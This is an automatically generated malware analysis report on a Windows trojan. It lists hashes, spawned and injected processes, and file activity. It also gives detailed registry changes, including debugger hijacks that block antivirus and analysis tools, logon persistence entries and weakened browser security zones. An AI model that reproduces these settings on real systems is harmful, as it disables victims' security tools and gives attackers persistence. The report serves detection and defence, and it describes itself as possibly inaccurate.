Trojan.Win32.Diple.geej (Kaspersky), Trojan.GenericKD.2398642 (B) (Emsisoft), Trojan.GenericKD.2398642 (AdAware), Installer.Win32.SmartIM.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)Behaviour: Trojan, Installer
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: 56c3c75ea1bd95583aa4975ee6bfef79
SHA1: 38b156ed27a86520a47563b6aee73b5b84ddf059
SHA256: 73ed0ab961822dfaf4d9093fe131fc6e56710f6ae7443c280dd69f50bc111540
SSDeep: 49152:05obz83bF2EQTxV05MTw7ZlSkPkVgtEjn t8Y YxEj5rAL KnodsMU:2ob4ryV0dykPIFaK xEja70U
Size: 2580480 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: MicrosoftVisualC, UPolyXv05_v6
Company: no certificate found
Created at: 2015-05-10 19:12:59
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
No specific payload has been found.
Process activity
The Trojan creates the following process(es):
mswindows.exe:436
b09bbc0c.exe:212
csc.exe:2616
csc.exe:3560
csc.exe:4040
csc.exe:3144
csc.exe:2456
csc.exe:3324
csc.exe:1936
csc.exe:2696
bch_h8mn.exe:2760
honmznj1.exe:3400
%original file name%.exe:1780
%original file name%.exe:580
ping.exe:2120
ping.exe:268
ping.exe:3496
ping.exe:2840
ping.exe:2948
ping.exe:2792
ping.exe:2504
ping.exe:3720
ping.exe:500
cvtres.exe:4056
cvtres.exe:3204
cvtres.exe:2624
cvtres.exe:3340
cvtres.exe:3608
cvtres.exe:2468
cvtres.exe:244
cvtres.exe:2748
system.exe:3452
system.exe:2308
system.exe:4032
system.exe:2688
system.exe:3312
system.exe:2796
system.exe:376
qrv670kf.exe:3256
qkjdmucq.exe:2752
FB_1.tmp.exe:1452
xvnsxkn9.exe:2036
6g4zx02q.exe:3644
The Trojan injects its code into the following process(es):
FB_2.tmp.exe:612
cgjrsnhu.exe:2480
system.exe:2448
DW20.EXE:2548
svchost.exe:3856
ping.exe:3908
wmiprvse.exe:228
Explorer.EXE:532
services.exe:724
svchost.exe:904
svchost.exe:988
svchost.exe:1084
svchost.exe:1128
svchost.exe:1180
spoolsv.exe:1424
jqs.exe:1640
Mutexes
The following mutexes were created/opened:No objects were found.
File activity
The process FB_2.tmp.exe:612 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\2.tmp (12 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\4.tmp (10 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\$inst\7.tmp (6 bytes)
The process mswindows.exe:436 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\system.exe (17178 bytes)
%System%\clientsvr.exe (2105 bytes)
The Trojan deletes the following file(s):
%System%\clientsvr.exe (0 bytes)
The process csc.exe:2616 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC16.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qkjdmucq.exe (5120 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES17.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC16.tmp (0 bytes)
The process csc.exe:3560 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\6g4zx02q.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (652 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCB.tmp (0 bytes)
The process csc.exe:4040 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSCE.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSCE.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RESF.tmp (0 bytes)
The process csc.exe:3144 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\qrv670kf.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC19.tmp (652 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES1A.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC19.tmp (0 bytes)
The process csc.exe:2456 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC14.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC14.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES15.tmp (0 bytes)
The process csc.exe:3324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC8.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC8.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES9.tmp (0 bytes)
The process csc.exe:1936 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\b09bbc0c.exe (5120 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (652 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\CSC11.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (0 bytes)
The process csc.exe:2696 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (396 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC4.tmp (652 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.exe (4408 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES5.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\CSC4.tmp (0 bytes)
The process %original file name%.exe:1780 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\FB_1.tmp.exe (1655 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\FB_2.tmp.exe (9606 bytes)
The process cvtres.exe:4056 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESF.tmp (2912 bytes)
The process cvtres.exe:3204 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES1A.tmp (2920 bytes)
The process cvtres.exe:2624 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES17.tmp (2920 bytes)
The process cvtres.exe:3340 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES9.tmp (2912 bytes)
The process cvtres.exe:3608 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RESC.tmp (2912 bytes)
The process cvtres.exe:2468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES15.tmp (2920 bytes)
The process cvtres.exe:244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES12.tmp (2920 bytes)
The process cvtres.exe:2748 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\RES5.tmp (2912 bytes)
The process system.exe:3452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.0.cs (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\xvnsxkn9.0.cs (0 bytes)
The process system.exe:2308 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.0.cs (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\bch_h8mn.0.cs (0 bytes)
The process system.exe:2688 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
The process system.exe:2796 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.0.cs (230 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\honmznj1.0.cs (0 bytes)
The process system.exe:376 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (316 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.cmdline (249 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.0.cs (229 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.out (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.cmdline (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.err (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.0.cs (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\cgjrsnhu.tmp (0 bytes)
The process FB_1.tmp.exe:1452 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%System%\clientsvr.exe (2105 bytes)
Registry activity
The process FB_2.tmp.exe:612 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8B CA 0D 35 E9 AB 51 72 07 C8 BE 0F F8 08 82 09"
The process mswindows.exe:436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ComboFix.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVP.EXE]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"CyZOhdvIE8wuzICtz4cp g==" = "bbhPUfzhVVTW88hp3qZqjUwHiHepYvaGqjBFQBhKKL/rBpjPibZJSs9YGLDrJqrbUCpVJi516e09W/ltfDEs5LrqQlJeAYI4uIKK87D7wsA="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avcenter.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software]
"mImSgnjCHK/JIKrA/Sgt9Q==" = "f8sBVZHgbonlES5/kO10xA=="
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\%current user%\Local Settings\Temp]
"system.exe" = "mIRC"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgidsagent.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wireshark.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamscheduler.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamservice.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgwdsvc.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avconfig.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"MTX" = "e45b0a7574b2e3981138c55b46daa7852d30cbd7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\spybotsd.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbampt.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ccuac.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\AVGNT.EXE]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netstat.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastUI.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"qHuPqQiPOxjdEJg/yoZUow==" = "5uXOOzzyHhoW9NL Y0wcLQ=="
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software]
"y0PrE0Xk6OACjiGOJ3nrlg==" = "sJvJzeJRtfjV4luQlEDvigWDsplPslvWun8l9KiqtUZjAZ7QVNExZyv 0 nFcrYvtN2OC4l8Yj22g6Oy9/bdD5F6ws0eWh8zYY6po276 tBoO19I8Lbix97Mb1V2NywyjaPq98N97r5dvjX66ZP94NYhU1g7ZwOksWpqFUY16nQI6ut2HU5Fl02FVfoQMpkU1GZrVg0EaCBrmV/NjTqeN9hEAQoecwOq9QVmi 71FuMzy3e emkLppVQWLIF0CrTvEKfjE5jvgj38myJqnwXvGvPK/Oeh7KpyjJP059LhofeI9AP UoPxG24bDnjCbGt462D8/IYXrNn9dMAB 2SXq0SEnXcXhDMP/4gJBZZcYfR1mBM5QIkmmzl91yuC0HzJkMT F2vqqlJ/FnAzkAs/9l/nFAeqkIeGqlNeaGU9iKUTcBzu9U3TaXzevAT80W3XwjKsj4hyuwbGLrwv1XWY3nG3z97H5JjGCf f0wnVj0ACoMNjyFxoqXISwc5409J1tQn0Fc/9lRK74S7b7Ntt0zmHGcCCQ7VFWG6aCO6CPTXN00Sr9CAxjPPdgfYPj9XwcAmYNsWPKCTycyvA/TXVSRWzsmR/9L geNxhdCTh89Fh hIGNLHEM 7GZfIBzyf7tG2SrjimJN0bMXoyDPJ/DCv7JIZM1tdZCW2ujO0oBqyj7x0tMah60O7Upk EQhnX2VUjQSJixUHpaiWVPkbjtcJp2hTUZqPfJWuCB4oHkrgqNMZK3E2jdYVzy944ok5zWwoP1AhIu2QZaGCGOvwObJHr36aQy5c0xlq4FLp3H 7KGHss3CSTL10TGRWoXW70bA0eZSdOLEdPL2v6VpXgYJt5McY1kLAnYzM5MmSYAU="
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDFiles.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"pth" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\blindman.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgcsrvx.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbam.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mbamgui.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastSvc.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software]
"prc" = "436"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDMain.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avguard.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\SDWinSec.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "D3 E7 2A 0F 3E 3D B7 7D 05 41 F6 11 D6 FD 53 A1"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\zlclient.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avgrsx.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\keyscrambler.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avscan.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bdagent.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKCU\Software]
"1J/pfMWJhoYDlxlyE7IkK3gErIiNMdjannxwWJULzCY=" = " dXC Tqmj3zuI42NM6Ip7oqKKu3Fg6RMxyg3zMY46FYtyTfyHfOusJ4JKCKOcPCm"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software]
"MaWoUY3t8JlzDMSqcKJ92w==" = "vr5KwDkNaHP9u1AiwvWLdYGV2Z2KFYavO0rrSNCXOm8I8nWKPuAdU6EUpB1u0lbj uJ2EH81go/pTDuDMqnhoR8YkXvOw0WUoGT8967wx3azscKnAQbneGH53faEKRRELn7XYCzxz75NbpwL1F4IvlbM9eE2XjNalLE/666Aw5W rlxFlbBt 5CDusyDcgiiV99 Clk594tYguDP9/0zdSTFSdvW4 ZwCiRs4kwbSNfvdAB4xIGmlhyDcVqoJgghL/Ila3JqPb0xygW4SOIhgu2iDMEXivenj1P X8q1CPaE J/uwFfYsT8iNO7Ymq5L3k5V68k72YIA4dtuF2KmcETumd3WjjX5 Ucz7QeMPvOEmtecxZ3Kbr1keb2kX1fbU4bHszxncxxIuPA61Dba9wzddzzMR2r4F0V3/20D23RSkhTCEmTWFIIMfN64Zfq7"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\HijackThis.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\instup.exe]
"debugger" = "D:\375569\mswindows.exe"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rstrui.exe]
"debugger" = "D:\375569\mswindows.exe"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell" = "explorer.exe,D:\375569\mswindows.exe"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan adds the reference to itself to be executed when a user logs on:
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"UserInit" = "userinit.exe,%System%\clientsvr.exe"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"MSUpdate" = "D:\375569\mswindows.exe"
The process b09bbc0c.exe:212 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 99 38 2B 9E 54 00 A3 A2 C8 FE 30 6B 5E F5 47"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Personal" = "%Documents and Settings%\%current user%\My Documents"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The process csc.exe:2616 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FE A8 A4 4B 14 19 8B 36 68 43 CC 21 F8 25 41 32"
The process csc.exe:3560 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AE 35 04 50 7C FD AB 83 B7 77 54 18 47 AB D4 35"
The process csc.exe:4040 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3D 18 29 DD 38 83 94 69 2B E3 14 E5 AD 11 00 7D"
The process csc.exe:3144 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 0A D0 BA D0 B5 BB EF C7 EA 77 31 CC 8F 34 C0"
The process csc.exe:2456 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B FC C5 B6 FF F6 28 D4 21 53 45 20 2A 54 F9 D1"
The process csc.exe:3324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B7 0F 45 DC B7 65 15 62 EF E9 04 EB 5C 10 B4 43"
The process csc.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6E 2C 49 58 0E C7 0C 9A 48 E4 04 C3 39 6C C8 0A"
The process csc.exe:2696 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3E D0 B5 C1 B4 70 EE EF 16 FC 08 63 4B 83 E8 D6"
The process bch_h8mn.exe:2760 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 BC B2 82 3C FC FE B1 B8 96 9F B1 12 B2 B2 97"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
